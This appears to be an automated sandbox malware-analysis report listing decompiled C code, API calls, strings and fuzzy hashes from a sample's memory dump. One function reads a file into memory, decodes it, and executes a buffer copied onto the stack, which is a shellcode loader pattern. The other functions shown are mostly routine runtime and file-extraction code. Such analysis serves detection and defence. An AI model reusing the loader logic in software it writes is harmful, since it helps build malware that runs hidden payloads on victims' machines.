Part of subcall function 00402D10: GetProcAddress.KERNEL32(00000000), ref: 00402DCA
Part of subcall function 00402D10: LoadLibraryA.KERNEL32(?,?), ref: 00402E14
Part of subcall function 00402D10: GetProcAddress.KERNEL32(00000000), ref: 00402E17
Part of subcall function 00402D10: LoadLibraryA.KERNEL32(?,.23L), ref: 00402E58
Part of subcall function 00402D10: GetProcAddress.KERNEL32(00000000), ref: 00402E5B

GetProcAddress.KERNEL32(00000000,00000002), ref: 00403484

Strings

N, xrefs: 0040335F
s, xrefs: 004033BA
e, xrefs: 004033C8
.23L, xrefs: 004033B0, 004033B4
I, xrefs: 004033B5
r, xrefs: 004033D7
K, xrefs: 00403356
P, xrefs: 004033CD
B, xrefs: 004033BF
t, xrefs: 004033D2

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: .23L$B$I$K$N$P$e$r$s$t
API String ID: 2574300362-3392555607
Opcode ID: 29d237e436c54b2257fb4ddf0f711995b4f3234acbc02b9b4333de291fa6b537
Instruction ID: a91efa0748e9cab470246e31940816717a44cb7d165b95e41264eea58408d903
Opcode Fuzzy Hash: 29d237e436c54b2257fb4ddf0f711995b4f3234acbc02b9b4333de291fa6b537
Instruction Fuzzy Hash: 8E51617150C3819FD301CF28D84475BBBD4AF95308F444A6EF899AB382D779EA09C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00403AE0, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 70
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00403AE0(CHAR* _a4) {
				signed int _v4;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				long _v16;
				signed int _t11;
				void* _t14;
				void* _t16;
				intOrPtr* _t22;
				void* _t25;
				void* _t30;
				void* _t35;
				long _t37;
				void* _t43;
				signed int _t47;
				void* _t48;

				_t47 =  &_v16;
				_t11 =  *0x44f5d0; // 0x765b253d
				_v4 = _t11 ^ _t47;
				_t14 = CreateFileA(_a4, 0x80000000, 0, 0, 3, 0x80, 0); // executed
				_t43 = _t14;
				_t37 = GetFileSize(_t43, 0);
				_t16 = VirtualAlloc(0, _t37, 0x1000, 4); // executed
				_t30 = _t16;
				ReadFile(_t43, _t30, _t37,  &_v16, 0); // executed
				CloseHandle(_t43);
				E00403AC0(_t30, _t37);
				_t22 = E00403570(_t30, _t35, _t37, _t43);
				_t46 = _t22; // executed
				VirtualFree(_t30, 0, 0x8000); // executed
				if(_t22 != 0) {
					_push( &_v12);
					_v12 = 0x53;
					_v11 = 0x56;
					_v10 = 0x50;
					_v9 = 0x37;
					_v8 = 0;
					_t25 = E00403810(_t46);
					_t48 = _t47 + 4;
					if(_t25 != 0) {
						 *(memcpy(_t48 - 0x2a8, ").+,))!,**,()$", 0xaa << 2))(); // executed
					}
					E004038B0(_t46, _t46);
				}
				ExitProcess(0);
			}

0x00403ae0
0x00403ae3
0x00403aea
0x00403b09
0x00403b0f
0x00403b21
0x00403b26
0x00403b2e
0x00403b38
0x00403b3f
0x00403b49
0x00403b4e
0x00403b5b
0x00403b5d
0x00403b65
0x00403b6b
0x00403b6e
0x00403b73
0x00403b78
0x00403b7d
0x00403b82
0x00403b87
0x00403b8c
0x00403b91
0x00403ba7
0x00403ba7
0x00403bab
0x00403bab
0x00403bb2

APIs

CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00403B09
GetFileSize.KERNEL32(00000000,00000000), ref: 00403B14
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 00403B26
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 00403B38
CloseHandle.KERNEL32(00000000), ref: 00403B3F
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00403B5D
ExitProcess.KERNEL32 ref: 00403BB2

Strings

).+,))!,**,()$, xrefs: 00403BA0
P, xrefs: 00403B78
S, xrefs: 00403B6E
V, xrefs: 00403B73
7, xrefs: 00403B7D

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Virtual$AllocCloseCreateExitFreeHandleProcessReadSize
String ID: ).+,))!,**,()$$7$P$S$V
API String ID: 1451760990-3891380309
Opcode ID: f9d73fea26d4cac9f68b55999740ecba5f2e0803aecce9b1b65e3f9dfca6e4fd
Instruction ID: 8583e24197c12c077cdddf8a56e554f9e1de04c88ba3e0418f904589240653b2
Opcode Fuzzy Hash: f9d73fea26d4cac9f68b55999740ecba5f2e0803aecce9b1b65e3f9dfca6e4fd
Instruction Fuzzy Hash: ED2163716043416BE360AF75AC09F1B7ADC9B85B05F04447CB645AB2D2DAB4DA0887AE

Uniqueness

Uniqueness Score: -1.00%

Function 00416F0E, Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00416F0E() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				signed int __edi;
				void* __esi;
				struct _CRITICAL_SECTION* _t38;
				intOrPtr _t39;
				void* _t40;
				long _t43;
				void* _t44;
				void* _t60;
				long _t63;
				void* _t65;
				void* _t66;
				void* _t68;
				signed char* _t76;
				signed int _t80;
				void* _t83;
				void* _t85;
				signed int _t86;
				void* _t88;
				void* _t89;
				void* _t91;

				_push(_t68);
				_push(_t86);
				_t83 = _t68;
				_t1 = _t83 + 0x1c; // 0x4527c8
				_t38 = _t1;
				_v4 = _t38;
				EnterCriticalSection(_t38);
				_t3 = _t83 + 4; // 0x20
				_t39 =  *_t3;
				_t4 = _t83 + 8; // 0x3
				if( *_t4 >= _t39) {
					L6:
					_t80 = 1;
					if(_t39 <= 1) {
						L11:
						_t20 = _t39 + 0x20; // 0x40
						_t86 = _t20;
						_t21 = _t83 + 0x10; // 0x6e2fe8
						_t40 =  *_t21;
						if(_t40 != 0) {
							_t65 = GlobalHandle(_t40);
							GlobalUnlock(_t65);
							_t43 = E00405670(_t86, 8);
							_t68 = 0x2002;
							_t44 = GlobalReAlloc(_t65, _t43, ??);
						} else {
							_t63 = E00405670(_t86, 8);
							_pop(_t68);
							_t44 = GlobalAlloc(2, _t63); // executed
						}
						if(_t44 != 0) {
							_t66 = GlobalLock(_t44);
							_t24 = _t83 + 4; // 0x20
							E004277B0(_t80, _t66 +  *_t24 * 8, 0, _t86 -  *_t24 << 3);
							 *(_t83 + 4) = _t86;
							 *(_t83 + 0x10) = _t66;
							goto L19;
						} else {
							_t22 = _t83 + 0x10; // 0x6e2fe8
							_t85 =  *_t22;
							if(_t85 != 0) {
								GlobalLock(GlobalHandle(_t85));
							}
							LeaveCriticalSection(_v4);
							_push(_t86);
							_t88 = _t91;
							_push(_t68);
							_v28 = 0x44e8a0;
							E00429326( &_v28, 0x448908);
							asm("int3");
							_push(_t88);
							_t89 = _t91;
							_push(_t68);
							_v36 = 0x44e938;
							E00429326( &_v36, 0x44894c);
							asm("int3");
							_push(_t89);
							_push(_t68);
							_t9 =  &_v44; // 0x44e938
							_v44 = 0x44e9d0;
							E00429326(_t9, 0x448990);
							asm("int3");
							_t60 = _t68;
							 *((intOrPtr*)(_t60 + 4)) = 1;
							return _t60;
						}
					} else {
						_t17 = _t83 + 0x10; // 0x6e2fe8
						_t76 =  *_t17 + 8;
						while(( *_t76 & 0x00000001) != 0) {
							_t80 = _t80 + 1;
							_t76 =  &(_t76[8]);
							if(_t80 < _t39) {
								continue;
							}
							break;
						}
						if(_t80 < _t39) {
							goto L19;
						} else {
							goto L11;
						}
					}
				} else {
					_t12 = __esi + 0x10; // 0x6e2fe8
					if(( *( *_t12 + __edi * 8) & 0x00000001) == 0) {
						L19:
						_t29 = _t83 + 0xc; // 0x3
						if(_t80 >=  *_t29) {
							_t30 = _t80 + 1; // 0x4
							 *((intOrPtr*)(_t83 + 0xc)) = _t30;
						}
						_t32 = _t83 + 0x10; // 0x6e2fe8
						 *( *_t32 + _t80 * 8) =  *( *_t32 + _t80 * 8) | 0x00000001;
						_t36 = _t80 + 1; // 0x4
						 *((intOrPtr*)(_t83 + 8)) = _t36;
						LeaveCriticalSection(_v4);
						return _t80;
					} else {
						goto L6;
					}
				}
			}

0x00416f0e
0x00416f10
0x00416f12
0x00416f14
0x00416f14
0x00416f19
0x00416f1d
0x00416f23
0x00416f23
0x00416f26
0x00416f2b
0x00416f3a
0x00416f3c
0x00416f3f
0x00416f5c
0x00416f5c
0x00416f5c
0x00416f5f
0x00416f5f
0x00416f64
0x00416f82
0x00416f85
0x00416f93
0x00416f99
0x00416f9c
0x00416f66
0x00416f69
0x00416f6f
0x00416f73
0x00416f73
0x00416fa4
0x00416fd1
0x00416fd3
0x00416fe4
0x00416fec
0x00416fef
0x00000000
0x00416fa6
0x00416fa6
0x00416fa6
0x00416fab
0x00416fb5
0x00416fb5
0x00416fbf
0x00415804
0x00415805
0x00415807
0x00415811
0x00415818
0x0041581d
0x0041581e
0x0041581f
0x00415821
0x0041582b
0x00415832
0x00415837
0x00415838
0x0041583b
0x00415841
0x00415845
0x0041584c
0x00415851
0x00415852
0x00415854
0x0041585b
0x0041585b
0x00416f41
0x00416f41
0x00416f44
0x00416f47
0x00416f4c
0x00416f4d
0x00416f52
0x00000000
0x00000000
0x00000000
0x00416f52
0x00416f56
0x00000000
0x00000000
0x00000000
0x00000000
0x00416f56
0x00416f2d
0x00416f2d
0x00416f34
0x00416ff2
0x00416ff2
0x00416ff5
0x00416ff7
0x00416ffa
0x00416ffa
0x00416ffd
0x00417007
0x0041700a
0x0041700d
0x00417010
0x0041701d
0x00000000
0x00000000
0x00000000
0x00416f34

APIs

EnterCriticalSection.KERNEL32(004527C8,?,?,?,?,004527AC,0041725F,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00416F1D
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,004527AC,0041725F,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00416F73
GlobalHandle.KERNEL32(006E2FE8), ref: 00416F7C
GlobalUnlock.KERNEL32(00000000,?,?,?,?,004527AC,0041725F,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00416F85
GlobalReAlloc.KERNEL32 ref: 00416F9C
GlobalHandle.KERNEL32(006E2FE8), ref: 00416FAE
GlobalLock.KERNEL32 ref: 00416FB5
LeaveCriticalSection.KERNEL32(00401099,?,?,?,?,004527AC,0041725F,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00416FBF
GlobalLock.KERNEL32 ref: 00416FCB
_memset.LIBCMT ref: 00416FE4
LeaveCriticalSection.KERNEL32(?,00000000,765B253D), ref: 00417010

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 6e89c913dff7a1627d137c85a4fffbfd0b83350ca2fb13c56a65863bd4a98f92
Instruction ID: c3bcd00eac62de9b530a75537476aaaa91939dad9910e48044c13ab1a52d64a2
Opcode Fuzzy Hash: 6e89c913dff7a1627d137c85a4fffbfd0b83350ca2fb13c56a65863bd4a98f92
Instruction Fuzzy Hash: BC31BC716007059FD7249F74EC48A67B7E9FB44314B01892EF996C3650DB38F886CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004094C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 211
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004094C0(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t50;
				intOrPtr _t52;
				long _t54;
				intOrPtr* _t55;
				long _t56;
				void* _t61;
				struct _OVERLAPPED* _t68;
				int _t73;
				void* _t74;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t86;
				void* _t88;
				intOrPtr* _t92;
				char _t93;
				intOrPtr _t102;
				long _t106;
				intOrPtr* _t111;
				void* _t114;
				signed int _t115;
				signed int _t116;
				intOrPtr _t117;
				long _t118;
				void* _t119;
				intOrPtr* _t123;
				signed int _t126;
				void* _t127;
				signed int _t128;

				_t50 =  *0x44f5d0; // 0x765b253d
				 *(_t126 + 0x340) = _t50 ^ _t126;
				_t123 =  *((intOrPtr*)(_t126 + 0x350));
				_push(_t115);
				_t116 = _t115 | 0xffffffff;
				_t111 = __ecx;
				if( *(_t123 + 4) != _t116) {
					E00408BD0( *_t123, _t116, _t123);
				}
				_t84 =  *((intOrPtr*)(_t126 + 0x35c));
				 *(_t123 + 4) = _t116;
				_t117 =  *_t123;
				if(_t84 <  *((intOrPtr*)(_t117 + 4))) {
					__eflags = _t84 -  *((intOrPtr*)(_t117 + 0x10));
					if(_t84 <  *((intOrPtr*)(_t117 + 0x10))) {
						E004085A0(_t117);
					}
					_t52 =  *_t123;
					__eflags =  *((intOrPtr*)(_t52 + 0x10)) - _t84;
					if( *((intOrPtr*)(_t52 + 0x10)) < _t84) {
						do {
							E004085E0( *_t123);
							_t102 =  *_t123;
							__eflags =  *((intOrPtr*)(_t102 + 0x10)) - _t84;
						} while ( *((intOrPtr*)(_t102 + 0x10)) < _t84);
					}
					E00408E60(_t123, _t126 + 0x20, _t84);
					__eflags =  *(_t126 + 0x124) & 0x00000010;
					_t54 =  *_t111;
					if(( *(_t126 + 0x124) & 0x00000010) == 0) {
						__eflags = _t54;
						_t85 = _t111;
						_t92 = _t111;
						while(_t54 != 0) {
							__eflags = _t54 - 0x2f;
							if(_t54 == 0x2f) {
								L20:
								_t15 = _t92 + 1; // 0x1
								_t85 = _t15;
							} else {
								__eflags = _t54 - 0x5c;
								if(_t54 == 0x5c) {
									goto L20;
								}
							}
							_t54 =  *((intOrPtr*)(_t92 + 1));
							_t92 = _t92 + 1;
							__eflags = _t54;
						}
						_t55 = _t111;
						_t106 = _t126 + 0x148 - _t111;
						__eflags = _t106;
						do {
							_t93 =  *_t55;
							 *((char*)(_t106 + _t55)) = _t93;
							_t55 = _t55 + 1;
							__eflags = _t93;
						} while (_t93 != 0);
						__eflags = _t85 - _t111;
						if(_t85 != _t111) {
							 *((char*)(_t126 + _t85 - _t111 + 0x148)) = 0;
							_t56 =  *((intOrPtr*)(_t126 + 0x148));
							__eflags = _t56 - 0x2f;
							if(_t56 == 0x2f) {
								L33:
								wsprintfA(_t126 + 0x254, "%s%s", _t126 + 0x14c, _t85);
								_t109 = _t126 + 0x158;
								E004093A0(_t85, _t123, 0, _t126 + 0x158);
								_t127 = _t126 + 0x18;
								goto L27;
							} else {
								__eflags = _t56 - 0x5c;
								if(_t56 == 0x5c) {
									goto L33;
								} else {
									__eflags = _t56;
									if(_t56 == 0) {
										goto L26;
									} else {
										__eflags =  *((char*)(_t126 + 0x149)) - 0x3a;
										if( *((char*)(_t126 + 0x149)) != 0x3a) {
											goto L26;
										} else {
											goto L33;
										}
									}
								}
							}
							L49:
						} else {
							 *((char*)(_t126 + 0x148)) = _t93;
							L26:
							wsprintfA(_t126 + 0x258, "%s%s%s", _t123 + 0x140, _t126 + 0x14c, _t85);
							_t109 = _t126 + 0x15c;
							E004093A0(_t85, _t123, _t123 + 0x140, _t126 + 0x15c);
							_t127 = _t126 + 0x1c;
						}
						L27:
						_t61 = CreateFileA(_t127 + 0x264, 0x40000000, 0, 0, 2,  *(_t127 + 0x124), 0); // executed
						_t86 = _t61;
						__eflags = _t86 - 0xffffffff;
						if(_t86 != 0xffffffff) {
							_t109 =  *(_t123 + 0x138);
							_push( *(_t123 + 0x138));
							E00408810( *_t123);
							_t128 = _t127 + 4;
							__eflags =  *(_t123 + 0x13c);
							if(__eflags == 0) {
								_t74 = E0040A3F7(__eflags, 0x4000);
								_t128 = _t128 + 4;
								 *(_t123 + 0x13c) = _t74;
							}
							 *(_t128 + 0x14) = 0;
							while(1) {
								_t118 = E00408990( *_t123, 0x4000,  *(_t123 + 0x13c), _t128 + 0x13);
								_t128 = _t128 + 8;
								__eflags = _t118 - 0xffffff96;
								if(_t118 == 0xffffff96) {
									break;
								}
								__eflags = _t118;
								if(__eflags < 0) {
									L43:
									 *(_t128 + 0x14) = 0x5000000;
								} else {
									if(__eflags <= 0) {
										L41:
										__eflags =  *((char*)(_t128 + 0x13));
										if( *((char*)(_t128 + 0x13)) != 0) {
											_t109 = _t128 + 0x12c;
											SetFileTime(_t86, _t128 + 0x138, _t128 + 0x12c, _t128 + 0x138); // executed
										} else {
											__eflags = _t118;
											if(_t118 != 0) {
												continue;
											} else {
												goto L43;
											}
										}
									} else {
										_t109 = _t128 + 0x1c;
										_t73 = WriteFile(_t86,  *(_t123 + 0x13c), _t118, _t128 + 0x1c, 0); // executed
										__eflags = _t73;
										if(_t73 == 0) {
											 *(_t128 + 0x14) = 0x400;
										} else {
											goto L41;
										}
									}
								}
								L47:
								FindCloseChangeNotification(_t86); // executed
								E00408BD0( *_t123, _t118, _t123);
								_t68 =  *(_t128 + 0x14);
								goto L48;
							}
							 *(_t128 + 0x14) = 0x1000;
							goto L47;
						} else {
							_t68 = 0x200;
						}
					} else {
						__eflags = _t54 - 0x2f;
						if(_t54 == 0x2f) {
							L14:
							E004093A0(_t84, _t123, 0, _t111);
							_t128 = _t126 + 8;
							_t68 = 0;
						} else {
							__eflags = _t54 - 0x5c;
							if(_t54 == 0x5c) {
								goto L14;
							} else {
								__eflags = _t54;
								if(_t54 == 0) {
									L15:
									E004093A0(_t84, _t123 + 0x140, _t123 + 0x140, _t111);
									_t128 = _t126 + 8;
									_t68 = 0;
								} else {
									__eflags =  *((char*)(_t111 + 1)) - 0x3a;
									if( *((char*)(_t111 + 1)) != 0x3a) {
										goto L15;
									} else {
										goto L14;
									}
								}
							}
						}
					}
				} else {
					_t68 = 0x10000;
				}
				L48:
				_pop(_t114);
				_pop(_t119);
				_pop(_t88);
				return E0042569C(_t68, _t88,  *(_t128 + 0x350) ^ _t128, _t109, _t114, _t119);
				goto L49;
			}

0x004094c6
0x004094cd
0x004094d6
0x004094dd
0x004094de
0x004094e5
0x004094e7
0x004094ec
0x004094ec
0x004094f1
0x004094f8
0x004094fb
0x00409501
0x0040950d
0x00409510
0x00409512
0x00409512
0x00409517
0x0040951a
0x0040951d
0x00409520
0x00409523
0x00409528
0x0040952b
0x0040952b
0x00409520
0x00409537
0x0040953c
0x00409544
0x00409546
0x00409583
0x00409585
0x00409587
0x00409589
0x00409590
0x00409592
0x00409598
0x00409598
0x00409598
0x00409594
0x00409594
0x00409596
0x00000000
0x00000000
0x00409596
0x0040959b
0x0040959e
0x004095a1
0x004095a1
0x004095ac
0x004095ae
0x004095ae
0x004095b0
0x004095b0
0x004095b2
0x004095b5
0x004095b8
0x004095b8
0x004095bc
0x004095be
0x00409633
0x0040963b
0x00409642
0x00409644
0x00409660
0x00409676
0x0040967c
0x00409686
0x0040968b
0x00000000
0x00409646
0x00409646
0x00409648
0x00000000
0x0040964a
0x0040964a
0x0040964c
0x00000000
0x00409652
0x00409652
0x0040965a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040965a
0x0040964c
0x00409648
0x00000000
0x004095c0
0x004095c0
0x004095c7
0x004095e4
0x004095ea
0x004095f3
0x004095f8
0x004095f8
0x004095fb
0x00409618
0x0040961e
0x00409620
0x00409623
0x00409693
0x0040969c
0x0040969d
0x004096a2
0x004096a5
0x004096ac
0x004096b3
0x004096b8
0x004096bb
0x004096bb
0x004096c7
0x004096d0
0x004096e9
0x004096eb
0x004096ee
0x004096f1
0x00000000
0x00000000
0x004096f3
0x004096f5
0x0040971a
0x0040971a
0x004096f7
0x004096f7
0x0040970f
0x0040970f
0x00409714
0x00409740
0x00409751
0x00409716
0x00409716
0x00409718
0x00000000
0x00000000
0x00000000
0x00000000
0x00409718
0x004096f9
0x00409701
0x00409709
0x0040970b
0x0040970d
0x0040972e
0x00000000
0x00000000
0x00000000
0x0040970d
0x004096f7
0x00409757
0x00409758
0x00409761
0x00409766
0x00000000
0x00409766
0x00409724
0x00000000
0x00409625
0x00409625
0x00409625
0x00409548
0x00409548
0x0040954a
0x0040955a
0x0040955d
0x00409562
0x00409565
0x0040954c
0x0040954c
0x0040954e
0x00000000
0x00409550
0x00409550
0x00409552
0x0040956c
0x00409574
0x00409579
0x0040957c
0x00409554
0x00409554
0x00409558
0x00000000
0x00000000
0x00000000
0x00000000
0x00409558
0x00409552
0x0040954e
0x0040954a
0x00409503
0x00409503
0x00409503
0x0040976a
0x00409771
0x00409772
0x00409774
0x00409782
0x00000000

Strings

:, xrefs: 00409652
%s%s%s, xrefs: 004095DE
%s%s, xrefs: 00409670

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesCreateDirectoryFile
String ID: %s%s$%s%s%s$:
API String ID: 3401506121-3034790606
Opcode ID: 5a505b145ee6f5bea3e255a0700a2dba384a359b7c46ef74d87cf3ddeeb1b0d5
Instruction ID: 45e847b317bac9fb1a2ee644c9baaa17c33602d330d144c5589628bfc4c73708
Opcode Fuzzy Hash: 5a505b145ee6f5bea3e255a0700a2dba384a359b7c46ef74d87cf3ddeeb1b0d5
Instruction Fuzzy Hash: BE710672504344ABD731DF25DC40BEB73A9AB85304F04493EF9896B2C3D679AD09C76A

Uniqueness

Uniqueness Score: -1.00%

Function 004208D4, Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004208D4(void* __ecx) {
				int _t5;
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx; // executed
				_t5 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t19 + 8)) = _t5;
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x4527e0 = GetSystemMetrics(2) + 1;
				 *0x4527e4 = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x004208df
0x004208e1
0x004208e5
0x004208ec
0x004208f4
0x004208fe
0x0042090f
0x00420919
0x00420921
0x0042092d

APIs

KiUserCallbackDispatcher.NTDLL ref: 004208E1
GetSystemMetrics.USER32 ref: 004208E8
GetSystemMetrics.USER32 ref: 004208EF
GetSystemMetrics.USER32 ref: 004208F9
GetDC.USER32(00000000), ref: 00420903
GetDeviceCaps.GDI32(00000000,00000058), ref: 00420914
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042091C
ReleaseDC.USER32 ref: 00420924

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
String ID:
API String ID: 1031845853-0
Opcode ID: fb98911d80ad8c338eb940ff8a7eba24d9deb1414422788d757d827e53f8c412
Instruction ID: fcee4d3c23d018ddaa4a0ef5ef315e199380c57e2787cfd0818a552e3ffdfc7b
Opcode Fuzzy Hash: fb98911d80ad8c338eb940ff8a7eba24d9deb1414422788d757d827e53f8c412
Instruction Fuzzy Hash: BDF01D71A40704AAE720AF71AC49F2B7BB4EBD5B51F11442AE6418B290D6B5D8018F54

Uniqueness

Uniqueness Score: -1.00%

Function 00426256, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00426256(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0x44a730);
				_t8 = E00428FAC(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E00428FF1(_t8);
				}
				if( *0x454918 != 3) {
					_push(_t24);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x452f40); // executed
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E00427761(_t32);
						 *_t10 = E00427726(GetLastError());
					}
					goto L9;
				}
				E0042E21D(__ebx, __edi, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E0042E296(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E0042E2C1();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E004262AC();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}

0x00426256
0x00426258
0x0042625d
0x00426262
0x00426267
0x004262de
0x004262e3
0x004262e3
0x00426270
0x004262b5
0x004262b6
0x004262b6
0x004262be
0x004262c4
0x004262c6
0x004262c8
0x004262db
0x004262dd
0x00000000
0x004262c6
0x00426274
0x0042627a
0x0042627f
0x00426285
0x0042628a
0x0042628c
0x0042628d
0x0042628e
0x00426294
0x00426295
0x0042629c
0x004262a5
0x00000000
0x004262a7
0x004262a7
0x00000000
0x004262a7

APIs

__lock.LIBCMT ref: 00426274

Part of subcall function 0042E21D: __mtinitlocknum.LIBCMT ref: 0042E231
Part of subcall function 0042E21D: __amsg_exit.LIBCMT ref: 0042E23D
Part of subcall function 0042E21D: EnterCriticalSection.KERNEL32(?,?,?,00426365,00000004,0044A750,0000000C,0042AD44,?,?,00000000,00000000,00000000,0042A9E6,00000001,00000214), ref: 0042E245

___sbh_find_block.LIBCMT ref: 0042627F
___sbh_free_block.LIBCMT ref: 0042628E
RtlFreeHeap.NTDLL(00000000,?,0044A730,0000000C,0042E1FE,00000000,0044A960,0000000C,0042E236,?,?,?,00426365,00000004,0044A750,0000000C), ref: 004262BE
GetLastError.KERNEL32(?,0040A3E6,?,?,00000000,00415543,0000000C,00000004,00401D16,000000FF,0040568B,80070057,=%[v,00417183,?,00000004), ref: 004262CF

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
